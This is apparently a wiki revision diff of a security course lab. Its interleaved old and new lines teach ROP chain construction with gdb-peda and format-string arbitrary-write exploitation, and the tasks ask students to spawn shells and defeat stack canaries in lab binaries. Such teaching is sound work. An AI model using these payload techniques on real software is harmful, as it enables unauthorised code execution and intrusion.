-As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters: +It is even possible to create coredump like image of the remote process and to reconstruct a binary from itIt is also helpful to find the cause of unsuccessful exploitation attempts.
-  * 1st param: RDI +
-  * 2nd param: RSI +
-  * 3rd param: RDX +
-Next we would need gadgets for eachLet's assume these 2 scenarios: +
-Scenario 1: +
-<code> +
-0x400124:  pop rdi; pop rsi; ret +
-0x400235:  pop rdx; ret +
-0x400440:  f1()+
  
-Payload: +If we cannot reach the exact format string boundary by using 4-Byte pops ('%08x'), we have to pad the format string, by prepending one, two or three junk characters.  
-RET + 0x00:   0x400124 +This is analog to the alignment in buffer overflow exploits. 
-RET + 0x08:   val of RDI (0xAB+ 
-RET + 0x10:   val of RSI (0xCD+==== Exploitation - through pure format strings ==== 
-RET + 0x18:   0x400235 +Our goal in the case of exploitation is to be able to control the instruction pointer, i.e we want to extend our very limited control — the ability to control the behaviour of the format function — to real execution control, that is executing our raw machine code. 
-RET + 0x20:   val of RDX +Let's take a look at the following code: 
-RET + 0x28:   f1+<code C> 
 +
 +char buffer[512]; 
 +snprintf (buffer, sizeof (buffer), user); 
 +buffer[sizeof (buffer- 1] = ’\0’; 
 +}
 </code> </code>
 +In the code above it is not possible to enlarge our buffer by inserting some kind of 'stretching' format parameter, because the program uses the secure ''snprintf'' function to assure we will not be able to exceed the buffer.
 +At first it may look as if we cannot do much useful things, except crashing the program and inspecting some memory.
  
-Scenario 2+Lets remember the format parameters mentioned. There is the '%n' parameter, which writes the number of bytes already printed, into a variable of our choice.  
-<code> +The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. 
-0x400125:  pop rdiret +Example
-0x400252:  pop rsi; ret +<code C
-0x400235:  pop rdx; ret +int i
-0x400440:  f1() +printf ("foobar%n\n", (int *&i); 
- +printf ("i = %d\n", i);
-Payload: +
-RET + 0x00:   0x400125 +
-RET + 0x08:   val of RDI (0xAB+
-RET + 0x10:   0x400252 +
-RET + 0x18:   val of RSI (0xCD) +
-RET + 0x20:   0x400235  +
-RET + 0x28:   val of RDX +
-RET + 0x30:   f1+
 </code> </code>
-Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide) +Would print "i = 6"With the same method we used above to print memory from arbitrary addresseswe can write to arbitrary locations:
- +
- +
-The second use of gadgets is to clear the stackRemember the issue we had in the **Motivation** section? Let's solve it using gadgets. +
-We need to call f1(0xAB0xCD) and then f2(0xEF, 0x42). Our initial solution was:+
 <code> <code>
-RET + 0x00:   addr of f1 +"AAA0_%08x.%08x.%08x.%08x.%08x.%n"
-RET + 0x04:   addr of f2 (return address after f1 finishes) +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2) +
-RET + 0x10:   0x42 (param2 of f2) +
 </code> </code>
  
-The problem is that those parameters of f1 are getting in the way of calling f2. We need to find a **pop pop ret** gadgetThe actual registers are not important+With the '%08x' parameter we increase the internal stack pointer of the format function by four bytes 
- +We do this until this pointer points to the beginning of our format string (to 'AAA0')This works, because usually our format string is located on the stack, on top of our normal format function stack frame.  
-<code> +The '%n' writes to the address 0x30414141that is represented by the string "AAA0". Normally this would crash the programsince this address is not mapped.  
-RET + 0x00:   addr of f1 +But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof (int)) at the address:
-RET + 0x04:   addr of (pop eaxpop ebxret)  +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1) +
-RET + 0x10:   addr of f2 +
-RET + 0x14:   JUNK +
-RET + 0x18:   0xEF (param1 of f2) +
-RET + 0x1c:   0x42 (param2 of f2)  +
-</code> +
-Now we can even call the next function f3 if we repeat the trick:+
 <code> <code>
-RET + 0x00:   addr of f1 +"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
-RET + 0x04:   addr of (pop eax, pop ebx, ret)  +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1) +
-RET + 0x10:   addr of f2 +
-RET + 0x14:   addr of (pop eax, pop ebx, ret)  +
-RET + 0x18:   0xEF (param1 of f2) +
-RET + 0x1c:   0x42 (param2 of f2)  +
-RET + 0x20:   addr of f3+
 </code> </code>
  
 +The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. 
 +We have reached one of our goals: we can write to arbitrary addresses. But we cannot control the number we are writing yet — but this will change.
  
-=== Some useful ninja tricks +The number we are writing — the count of characters written by the format function — is dependant on the format string.  
- +Since we control the format string, we can at least take influence on this counter, by writing more or less bytes
-==== Memory spraying +<code C
-Let'take the following prog+int a; 
-<code c+printf ("%10u%n"7350&a)
-int main(+/* == 10 */ 
-+int a
-        int x,z+printf ("%150u%n"7350&a); 
-        char a,b,c; +/* a == 150 */
-        char buf[23]+
-        read(0buf100); +
- +
-        return 0; +
-}+
 </code> </code>
 +By using a dummy parameter '%nu' we are able to control the counter written by '%n', at least a bit. 
 +But for writing large numbers — such as addresses — this is not sufficient, so we have to find a way to write arbitrary data.
  
-A fairly simple overflowright? How fast can you figure out the offset to the return address? How much padding do you need ? +An integer number on the x86 architecture is stored in four bytes, which are little-endian ordered, the least significant byte being the first in memory. 
-There is shortcut that you can use to figure this out in under 30 seconds without looking at the assembly.+So number like 0x0000014c is stored in memory as: "\x4c\x01\x00\x00".
  
-A [[ https://en.wikipedia.org/wiki/De_Bruijn_sequence | De Bruijn sequence ]] is a string of symbols out of a given alphabet  in which each consecutive K symbols only appear once in the whole string. If we can construct such a string out of printable characters then we only need to know the Segmentation Fault address. Converting it back to 4 bytes and searching for it in the initial string will give us the exact offset to the return address+For the counter in the format function we can control the least significant byte, the first byte stored in memory by using dummy '%nu' parameters to modify it. 
- +Example
-Peda can help you do this. Here's how+<code C
-<code bash+unsigned char foo[4]; 
-gdb-peda$ help pattern_create  +printf ("%64u%n", 7350, (int *) foo);
-Generate a cyclic pattern +
-Usage: +
-    pattern_create size [file+
- +
-gdb-peda$ pattern_create 100 +
-'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl' +
- +
-gdb-peda$ help pattern_offset  +
-Search for offset of a value in cyclic pattern +
-Usage: +
-    pattern_offset value +
- +
-gdb-peda$ pattern_offset AA8A +
-AA8A found at offset: 76+
 </code> </code>
  
-Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised: +When the printf function returnsfoo[0contains '\x40', which is equal to 64the number we used to increase the counter.
-<code bash> +
-# gdb -q ./a +
-Reading symbols from ./a...(no debugging symbols found)...done. +
-gdb-peda$ pattern_create 200 +
-'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A' +
-gdb-peda$ run +
-AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A +
- +
-Program received signal SIGSEGVSegmentation fault. +
-[----------------------------------registers-----------------------------------] +
-EAX: 0x0  +
-EBX: 0xf7f97e54 --> 0x1a6d5c  +
-ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-EDX: 0x64 ('d'+
-ESI: 0x0  +
-EDI: 0x0  +
-EBP: 0x41334141 ('AA3A'+
-ESP: 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-EIP: 0x41414541 ('AEAA'+
-EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) +
-[-------------------------------------code-------------------------------------] +
-Invalid $PC address: 0x41414541 +
-[------------------------------------stack-------------------------------------] +
-0000| 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0004| 0xffffcd74 ("AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0008| 0xffffcd78 ("AfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0012| 0xffffcd7c ("5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0016| 0xffffcd80 ("AAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0020| 0xffffcd84 ("A6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0024| 0xffffcd88 ("HAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0028| 0xffffcd8c ("AA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0032| 0xffffcd90 ("AIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0036| 0xffffcd94 ("iAA8AAJAAjAA9AAKAAkAALAAl"+
-0040| 0xffffcd98 ("AAJAAjAA9AAKAAkAALAAl"+
-0044| 0xffffcd9c ("AjAA9AAKAAkAALAAl"+
-0048| 0xffffcda0 ("9AAKAAkAALAAl"+
-0052| 0xffffcda4 ("AAkAALAAl"+
-0056| 0xffffcda8 ("ALAAl"+
-0060| 0xffffcdac --> 0x6c ('l'+
- +
-[------------------------------------------------------------------------------] +
-Legend: codedatarodata, value +
-Stopped reason: SIGSEGV +
-0x41414541 in ?? () +
- +
- +
- +
-gdb-peda$ pattern_search  +
-Registers contain pattern buffer: +
-EIP+0 found at offset: 35 +
-EBP+0 found at offset: 31 +
-Registers point to pattern buffer: +
-[ECX] --> offset 0 - size ~100 +
-[ESP] --> offset 39 - size ~61 +
-Pattern buffer found at: +
-0xffffcd49 : offset    0 - size  100 ($sp + -0x27 [-10 dwords]) +
-0xffffd1c6 : offset 23424 - size    4 ($sp + 0x456 [277 dwords]) +
-0xffffd1d8 : offset 22930 - size    4 ($sp + 0x468 [282 dwords]) +
-0xffffd276 : offset 48535 - size    4 ($sp + 0x506 [321 dwords]) +
-References to pattern buffer found at: +
-0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords]) +
-0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords])+
  
 +But for an address, there are four bytes that we have to control completely. If we are unable to write four bytes at once, we can try to write a byte a time for four times in a row. 
 +On most CISC architectures it is possible to write to unaligned arbitrary addresses. This can be used to write to the second least significant byte of the memory, where the address is stored.
 +This would look as follows:
 +<code C>
 +unsigned char canary[5];
 +unsigned char foo[4];
 +memset (foo, 0, sizeof (foo));
 +/* 0 * before */ strcpy (canary, "AAAA");
 +/* 1 */ printf ("%16u%n", 7350, (int *) &foo[0]);
 +/* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]);
 +/* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]);
 +/* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]);
 +/* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1],
 +foo[2], foo[3]);
 +printf ("canary: %02x%02x%02x%02x\n", canary[0],
 +canary[1], canary[2], canary[3]);
 +</code>
 +This returns the output "10204080" and "canary: 00000041". We overwrite four times the least significant byte of an integer we point to. 
 +By increasing the pointer each time, the least significant byte moves through the memory we want to write to, and allows us to store completely arbitrary data.
 +As you can see in the first row of the following figure, all eight bytes are not touched yet by our overwrite code. 
 +From the second row on we trigger four overwrites, shifted by one byte to the right for every step. 
 +The last row shows the final desired state: we overwrote all four bytes of our foo array, but while doing so, we destroyed three bytes of the canary array. 
 +We included the canary array just to see that we are overwriting memory we do not want to.
 +{{ :session:4-stage-overwrite.png?direct&350 |}}
 +Although this method looks complex, it can be used to overwrite arbitrary data at arbitrary addresses. 
 +For explanation we have only used one write per format string until now, but it is also possible to write multiple times within one format string:
 +<code C>
 +strcpy (canary, "AAAA");
 +printf ("%16u%n%16u%n%32u%n%64u%n",
 +        1, (int *) &foo[0], 1, (int *) &foo[1],
 +        1, (int *) &foo[2], 1, (int *) &foo[3]);
 +printf ("%02x%02x%02x%02x\n", foo[0], foo[1],
 +        foo[2], foo[3]);
 +printf ("canary: %02x%02x%02x%02x\n", canary[0],
 +        canary[1], canary[2], canary[3]);
 </code> </code>
  
 +We use the '1' parameters as dummy arguments to our '%u' paddings.  Also, the padding has changed, since the counter of the characters is already at 16 when we want to write 32. 
 +So we only have to add 16 characters instead of 32 to it, to get the results we desire.
 +This was a special case, in which all the bytes increased throughout the writes. But we could also write ''80 40 20 10'' with only a minor modification.
  
-==== Vulnerable function identification +Since we write integer numbers and the order is little endian, only the least significant byte is important in the writes.  
-As you can see from above, the base pointer gets trashed so backtracing is not possible +By using counters of 0x800x140, 0x220 and 0x310 characters respectivly when “%n” is triggered, we can construct the desired string.  
-<code bash+The code to calculate the desired numberof-written-chars counter is this: 
-gdb-peda$ bt +<code C
-#0  0x41414541 in ?? () +write_byte += 0x100; 
-#1  0x34414165 in ?? () +already_written %= 0x100; 
-#2  0x41464141 in ?? () +padding = (write_byte - already_written% 0x100; 
-#3  0x41416641 in ?? ()+if (padding < 10
 +    padding += 0x100;
 </code> </code>
-If this program was larger you wouldn't know which "ret" is the last one executed before jumping into the payload. 
-You can set a breakpoint on all declared functions (if the program has not been stripped) using **rbreak** and then ignoring them: 
-<code bash> 
-gdb-peda$ rbreak  
-Breakpoint 1 at 0x80482d4 
-<function, no debug info> _init; 
-Breakpoint 2 at 0x8048310 
-<function, no debug info> read@plt; 
-Breakpoint 3 at 0x8048320 
-<function, no debug info> __gmon_start__@plt; 
-Breakpoint 4 at 0x8048330 
-<function, no debug info> __libc_start_main@plt; 
-Breakpoint 5 at 0x8048340 
-<function, no debug info> _start; 
-Breakpoint 6 at 0x8048370 
-<function, no debug info> __x86.get_pc_thunk.bx; 
-Breakpoint 7 at 0x804843f 
-<function, no debug info> main; 
-Breakpoint 8 at 0x8048470 
-<function, no debug info> __libc_csu_init; 
-Breakpoint 9 at 0x80484e0 
-<function, no debug info> __libc_csu_fini; 
-Breakpoint 10 at 0x80484e4 
-<function, no debug info> _fini; 
  
 +Where 'write_byte' is the byte we want to create, 'already_written' is the current counter of written bytes the format function maintains and 'padding; is the number of bytes we have to increase the counter with.
 +Example:
 +<code C>
 +write_byte = 0x7f;
 +already_written = 30;
 +write_byte += 0x100; /* write_byte is 0x17f now */
 +already_written %= 0x100; /* already_written is 30 */
  
-gdb-peda$ commands +/* afterwards padding is 97 (= 0x61*
-Type commands for breakpoint(s1-10, one per line. +padding = (write_byte already_written% 0x100; 
-End with a line saying just "end"+if (padding < 10
->continue +    padding += 0x100;
->end +
- +
- +
-gdb-peda$ run +
-Starting program: /ctf/Hexcellents/summerschool2014/lab_material/session-12/tut1/ +
-warning: the debug information found in "/usr/lib64/debug/lib64/ld-2.17.so.debug" does not match "/lib/ld-linux.so.2" (CRC mismatch). +
- +
-warning: Could not load shared library symbols for linux-gate.so.1. +
-Do you need "set solib-search-path" or "set sysroot"? +
- +
-Breakpoint 4, 0x08048330 in __libc_start_main@plt (+
- +
-Breakpoint 8, 0x08048470 in __libc_csu_init () +
- +
-Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () +
- +
-Breakpoint 1, 0x080482d4 in _init () +
- +
-Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () +
- +
-Breakpoint 7, 0x0804843f in main () +
- +
-Breakpoint 2, 0x08048310 in read@plt () +
- +
-AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7 +
- +
-Program received signal SIGSEGV, Segmentation fault. +
-0x41414541 in ?? ()+
 </code> </code>
  
 +Now a format string of “%97u” would increase the '%n'-counter, so that the least significant byte equals 'write_byte'
 +The final check if the padding is below ten deserves some attention. A simple integer output, such as "%u" can generate a string of a length up to ten characters, depending on the integer number it outputs.
 +If the required length is larger than the padding we specify, say we want to output '1000' with a "%2u", our value will be dropped in favor to not losing any meaningful output. 
 +By ensuring our padding is always larger than 10, we can keep an always accurate number of ‘already_written’, the counter the format function maintains, since we always write exactly as much output bytes as specified with the length option in the format parameter.
  
-==== ROP payload debugging +==== A general method to exploit format strings vulnerabilities ==== 
-When you know what the offending function is, disassemble it and break on "ret" +The only remaining thing to exploit such vulnerabilities in a hands-on practical way is to put the arguments into the right order on the stack and use a stackpop sequence to increase the stack pointer.  
-<code bash> +It should look like
-gdb-peda$ pdis main +<code> 
-Dump of assembler code for function main: +<stackpop><dummy-addr-pair * 4><write-code>
-   0x0804843c <+0>: push   ebp +
-   0x0804843d <+1>: mov    ebp,esp +
-   0x0804843f <+3>: and    esp,0xfffffff0 +
-   0x08048442 <+6>: sub    esp,0x30 +
-   0x08048445 <+9>: mov    DWORD PTR [esp+0x8],0x64 +
-   0x0804844d <+17>: lea    eax,[esp+0x19] +
-   0x08048451 <+21>: mov    DWORD PTR [esp+0x4],eax +
-   0x08048455 <+25>: mov    DWORD PTR [esp],0x0 +
-   0x0804845c <+32>: call   0x8048310 <read@plt> +
-   0x08048461 <+37>: mov    eax,0x0 +
-   0x08048466 <+42>: leave   +
-   0x08048467 <+43>: ret     +
-End of assembler dump+
-gdb-peda$ b *0x08048467 +
-Breakpoint 1 at 0x8048467 +
- +
- +
-AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA +
-[----------------------------------registers-----------------------------------] +
-EAX0x0  +
-EBX: 0xf7f97e54 --> 0x1a6d5c  +
-ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA\n\300\317\377\367\034"+
-EDX: 0x64 ('d'+
-ESI: 0x0  +
-EDI: 0x0  +
-EBP: 0x41334141 ('AA3A'+
-ESP: 0xffffcd6c ("AEAAeAA4AAFAAfA\n\300\317\377\367\034"+
-EIP: 0x8048467 (<main+43>: ret) +
-EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) +
-[-------------------------------------code-------------------------------------] +
-   0x8048445 <main+9>: mov    DWORD PTR [esp+0x8],0x64 +
-   0x804844d <main+17>: lea    eax,[esp+0x19] +
-   0x8048451 <main+21>: mov    DWORD PTR [esp+0x4],eax +
-   0x8048455 <main+25>: mov    DWORD PTR [esp],0x0 +
-   0x804845c <main+32>: call   0x8048310 <read@plt> +
-   0x8048461 <main+37>: mov    eax,0x0 +
-   0x8048466 <main+42>: leave   +
-=> 0x8048467 <main+43>: ret     +
-   0x8048468: xchg   ax,ax +
-   0x804846a: xchg   ax,ax +
-   0x804846c: xchg   ax,ax +
-   0x804846e: xchg   ax,ax +
-   0x8048470 <__libc_csu_init>: push   ebp +
-   0x8048471 <__libc_csu_init+1>: push   edi +
-   0x8048472 <__libc_csu_init+2>: xor    edi,edi +
-   0x8048474 <__libc_csu_init+4>: push   esi +
-[------------------------------------stack-------------------------------------] +
-0000| 0xffffcd6c --> 0xf7e333e0 (<system>: sub    esp,0x1c) +
-0004| 0xffffcd70 --> 0x80484cf (<__libc_csu_init+95>: pop    ebp) +
-0008| 0xffffcd74 --> 0xf7f56be6 ("/bin/sh"+
-0012| 0xffffcd78 --> 0xf7e25c00 (<exit>: push   ebx) +
- +
- +
-gdb-peda$ patto AEAAeAA4AAFAAfA +
-AEAAeAA4AAFAAfA found at offset: 35+
 </code> </code>
 +Where: 
 + * **stackpop** The sequence of stack popping parameters that increase the stack pointer. Once the stackpop has been processed, the format function internal stack pointer points to the beginning of the dummy-addr-pair strings.
 + * **dummy-addr-pair** Four pairs of dummy integer values and addresses to write to. The addresses are increasing by one with each pair, the dummy integer value can be anything that does not contain NULL bytes.
 + * **write-code** The part of the format string that actually does the writing to the memory, by using '%nu%n' pairs, where n is greater than 10. The first part is used to increase or overflow the least significant byte of the format function internal bytes-written counter, and the '%n' is used to write this counter to the addresses that are within the dummy-addr-pair part of the string.
  
-Then you can break on all called functions or step as needed to see if the payload is doing what you want it to. +The write code has to be modified to match the number of bytes written by the stackpop, since the stackpop wrote already characters to the output when the format function parses the write-code — the format function counter does not start at zero, and this has to be considered
- +==== Direct Parameter Access ==== 
- +There is a huge simplification which is known as 'direct parameter access', a way to directly address a stack parameter from within the format string. Almost all currently in use C libraries do support this features, but not all are useable to apply this 
-==== checksec in peda +method to format string exploitation. 
-<code bash> +The direct parameter access is controlled by the '$' qualifier
-gdb-pedachecksec +<code C> 
-CANARY    disabled +printf ("%6$d\n", 6, 5, 4, 3, 2, 1);
-FORTIFY   : disabled +
-NX        : ENABLED +
-PIE       : disabled +
-RELRO     : Partial+
 </code> </code>
  
 +Prints '1', because the '6$' explicitly addresses the 6th parameter on the stack. Using this method the whole stack pop sequence can be left out.
  
-==== gadget finding in peda +<code C
-Apart from **objdump** which only finds aligned instructions, you can also use **dumprop** in peda to find all gadgets in a memory region or mapping: +char foo[4]; 
-<code bash+printf ("%1$16u%2$n" 
-gdb-pedastart +        "%1$16u%3$n" 
-.... +        "%1$32u%4$n" 
-gdb-pedadumprop +        "%1$64u%5$n"
-Warning: this can be very slowdo not run for large memory range +         1, 
-Writing ROP gadgets to file: a-rop.txt ... +        (int *) &foo[0](int *) &foo[1]
-0x8048467: ret +        (int *) &foo[2](int *) &foo[3]);
-0x804835d: iret +
-0x804838f: repz ret +
-0x80483be: ret 0xeac1 +
-0x80483a9: leave; ret +
-0x80485b4: inc ecx; ret +
-0x80484cf: pop ebp; ret +
-0x80482f5: pop ebx; ret +
-0x80484df: nop; repz ret +
-0x80483a8: ror cl,1; ret +
-0x804838e: add dh,bl; ret +
-0x80483e5: ror cl,cl; ret +
-0x8048465: add cl,cl; ret +
-0x804840b: leave; repz ret +
-0x8048371: sbb al,0x24; ret +
-0x80485b3: adc al,0x41; ret +
-0x8048370: mov ebx,[esp]; ret +
-0x80484de: nop; nop; repz ret +
-0x80483a7: call eax; leave; ret +
-0x80483e4: call edx; leave; ret +
-0x804840a: add ecx,ecx; repz ret +
-0x80484ce: pop edi; pop ebp; ret+
 </code> </code>
  
-Something finer is: 
-<code bash> 
-gdb-peda$ asmsearch "pop ? ; ret" 
-0x080482f5 : (5bc3) pop    ebx; ret 
-0x080484cf : (5dc3) pop    ebp; ret 
-0x080484f6 : (5bc3) pop    ebx; ret 
  
-gdb-peda$ asmsearch "pop ? ; pop ? ; ret" +==== Generalizing format string exploits ==== 
-0x080484ce (5f5dc3) pop    edi; pop    ebp; ret+The ''printf'' example is just one of many cases of format string vulnerabilities.  
 +In general, any system where user input affects program execution and data access in a custom way can be susceptible to such a vulnerability. Other specialized examples can be considered: 
 + * SQL injections 
 + * XSS injections 
 +===== Tasks =====
  
-gdb-peda$ asmsearch "call ?" +==== Stack Canaries ====
-0x080483a7 : (ffd0) call   eax +
-0x080483e4 : (ffd2) call   edx +
-0x0804842f : (ffd0) call   eax+
  
-</code>+Download the archive with the tasks at the top of the page. The binaries should be fairly easy to reverse engineer. You can use any tool.
  
-==== Anti-anti-debugging and others +=== Task 1 ===
-There can be various annoyances in binaries: **ptrace** calls for anti-debugging, **sleep** calls to prevent bruteforcing or **fork** calls to use child processes to serve requests. +
-These can all be deactivated using **unptrace** (for ptrace) and **deactive** in peda.+
  
 +The ''mycanary'' binary contains a custom stack canary implementation. Can you defeat it? Call ''bad_func()''.
  
 +=== Task 2 ===
  
-== Challenges+The ''bulletproof'' binary is compiled using GCC's SSP. I bet you can defeat it, **twice**! Don't let me down. Call ''bad_func()'' in **2 ways**: by overwriting a function pointer, and by overwriting a stack return address. **Disable ASLR for the second attack.**
  
-=== 1Challenge - Gadget tutorial+<note warning> 
 +You need to use the 32 bit VM to solve the second part of this task. 
 +</note>
  
-This task requires you to construct a payload using gadgets and calling the functions inside such that it will print +<note warning
-<code+''bad_func'' does not exit the programYou should use cat ''<payload_file> - | ./bulletproof'' so that you can detect if ''bad_func'' was called in the program loop. 
-Hello! +</note>
-stage A!stage B! +
-</code> +
-Make it also print the messages in reverse order: +
-<code> +
-Hello! +
-stage B!stage A! +
-</code>+
  
 +<note tip>In case you need some help on these, please take a look at the {{:session:canaries_source.zip|source code}} </note>
  
-=== 2. Challenge - Echo service 
-This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system("/bin/sh") the shell is opened in the terminal where the server was started instead of the one where the attack takes place. This happens because the client-server communication takes place over a socket. When you spawn a shell it will inherit the Standard I/O descriptors from the parent and use those. To fix this you need to redirect the socket fd into 0,1 (and optionally 2). 
- 
-So you will need to do the equivalent of the following in a ROP chain: 
-<code c> 
- dup2(sockfd, 1); 
- dup2(sockfd, 0); 
- system("/bin/sh"); 
-</code> 
  
 +==== Task 3 - Format Strings ====
 +Download the archive with the tasks at the top of the page containing 5 binaries exhibiting a format string vulnerability. Analyze what each binary does using the methods already familiar to you and try to determine the exact format string that will lead to the desired result. 
 +<note important>
 +The difficulty of the task associated with each binary increases with the number of the binary. 
 +</note>
 +<note tip>(gdb) p $_siginfo._sifields._sigfault.si_addr
 +shows you the invalid address associated with a SIGSEGV signal. 
 +</note>
  
-Exploit it first with ASLR disabled and then enabled. 
session/11.1594189135.txt.gz · Last modified: 2020/07/08 09:18 by Liza-Elena BABU (78556)